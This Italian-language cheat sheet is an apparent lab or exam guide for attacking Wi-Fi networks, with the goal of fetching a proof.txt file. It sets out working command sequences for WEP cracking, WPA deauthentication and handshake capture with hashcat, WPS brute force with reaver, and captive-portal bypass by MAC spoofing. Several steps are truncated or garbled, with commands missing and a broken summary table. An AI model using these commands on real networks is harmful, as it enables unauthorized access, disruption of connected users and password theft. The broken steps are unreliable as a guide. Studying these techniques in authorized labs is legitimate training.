17 Cheetsheat
Fase 0: Preparazione dell'Ambiente
Questa fase è cruciale e va eseguita all'inizio di ogni scenario per configurare correttamente la scheda di rete.
# 1. Identificare l'interfaccia wireless (es. wlan0)
iwconfig
# 2. Terminare i processi che potrebbero interferire (ESSENZIALE)
sudo airmon-ng check kill
# 3. Avviare la modalità monitor
sudo airmon-ng start wlan0
# L'interfaccia monitor sarà solitamente wlan0mon
# 4. Verificare che la modalità monitor sia attiva
iwconfig
Nota: Se necessario, riavviare il Network Manager per installare pacchetti:
Fase 1: Ricognizione (Reconnaissance)
L'obiettivo è identificare le reti target, i loro client e le vulnerabilità.
# Scansione completa di tutte le reti (2.4 GHz e 5 GHz)
sudo airodump-ng --band abg --manufacturer wlan0mon
--band abg: Include le reti a 5 GHz.
* --manufacturer: Mostra il produttore dell'AP.
* --wps: Mostra se il WPS è abilitato.
Durante l'attacco, blocca il canale sul target per non perdere pacchetti:
*-c <CHANNEL>: Blocca la scansione su un canale specifico.
* --bssid <BSSID>: Filtra il traffico per un AP specifico.
* -w <capture_file>: Salva la cattura in un file (es. capture).
Fase 2: Attacchi Specifici
2.1 Attacco a Reti WEP
Le reti WEP sono vulnerabili a causa della debolezza del suo algoritmo di cifratura.
Procedura:
1. Identificare la rete WEP: Usare airodump-ng --encrypt WEP.
2. Catturare gli IV (Initialization Vectors):
# Avviare la cattura sul canale e BSSID target
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w wep_capture wlan0mon
aireplay-ng in un'altra sessione terminale.
* Opzione B (Se non ci sono client associati): Eseguire un attacco di Fake Authentication.
# -1 0: Fake authentication attack
sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> wlan0mon
aireplay-ng -3).
4. Crackare la Chiave WEP:
Una volta raccolti abbastanza IV (circa 40.000), usare aircrack-ng:
2.2 Attacco a Reti WPA/WPA2-PSK
L'obiettivo è catturare l'handshake a 4 vie durante la connessione di un client.
Procedura: 1. Avviare la cattura sul canale e BSSID target:
2. Forzare la riconnessione (Deauthentication Attack): In un'altra sessione terminale, inviare pacchetti di deautenticazione per disconnettere un client. * Attacco mirato (consigliato):# -0 <num_pacchetti>: Deauthentication attack
sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon
airodump-ng mostrerà "WPA handshake" in alto a destra quando l'handshake è stato catturato.
4. Crackare la Password con Hashcat:
* Convertire il file .cap in formato .hccapx (o .22000):
# Usare hcxpcapngtool (successore di hcxpcaptool)
hcxpcapngtool -o hash_handshake.hc22000 wpa_capture-01.cap
rockyou.txt:
# -m 22000: Modalità per WPA/WPA2 PMKID e handshake
sudo hashcat -m 22000 hash_handshake.hc22000 /usr/share/wordlists/rockyou.txt
2.3 Attacco WPS (Wi-Fi Protected Setup)
Il WPS è spesso vulnerabile a brute-force a causa della sua implementazione.
# 1. Identificare AP con WPS abilitato
sudo wash -i wlan0mon -s
# 2. Attacco brute-force con Reaver
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv
-K di reaver).
2.4 Bypass del Captive Portal
Questa tecnica, discussa nella riunione, permette di aggirare il portale di autenticazione di una rete ospite.
Procedura: 1. Monitorare il traffico per identificare un client già autenticato sulla rete target:
2. Annotare il MAC Address di un client associato (<CLIENT_MAC>).
3. Spoofare il MAC Address sulla propria interfaccia di rete (che deve essere in modalità gestita, non monitor).
* Metodo 1 (Macchanger):
sudo systemctl stop network-manager
sudo ip link set wlan0 down
sudo macchanger -m <CLIENT_MAC> wlan0
sudo ip link set wlan0 up
sudo systemctl start network-manager
sudo ip link set wlan0 down
sudo ip link set wlan0 address <CLIENT_MAC>
sudo ip link set wlan0 up
Fase 3: Accesso e Raccolta della Prova (Proof)
Dopo aver ottenuto la chiave WEP/WPA o aver bypassato il Captive Portal, l'obiettivo finale è connettersi alla rete e recuperare il file proof.txt.
- Connettersi alla Rete Target:
- WPA/WPA2: Creare un file
wpa_supplicant.confcon la chiave trovata o usare il gestore di rete grafico. - Rete Aperta/Bypass: Connettersi semplicemente alla rete.
- WPA/WPA2: Creare un file
- Accedere al Server Target: L'AP fornisce un server web all'indirizzo
http://192.168.1.1. - Recuperare la Prova:
- Documentazione: È obbligatorio fare screenshot del processo e del
proof.txtper il report finale.
Riepilogo dei Comandi Principali
| Fase | Comando |
|---|---|
| Setup | sudo airmon-ng check kill |
sudo airmon-ng start wlan0 |
|
| Scansione | sudo airodump-ng --band abg --manufacturer wlan0mon |
| Cattura Mirata | sudo airodump-ng -c <CH> --bssid <BSSID> -w <file> wlan0mon |
| Deauth (WPA) | sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon |
| Crack WEP | sudo aircrack-ng <capture_file>.cap |
| Crack WPA (Hashcat) | hcxpcapngtool -o hash.hc22000 <capture_file>.cap |
sudo hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt |
|
| Spoof MAC | sudo ip link set wlan0 down && sudo ip link set wlan0 address <NEW_MAC> && sudo ip link set wlan0 up |
| Prova Finale | curl http://192.168.1.1/proof.txt |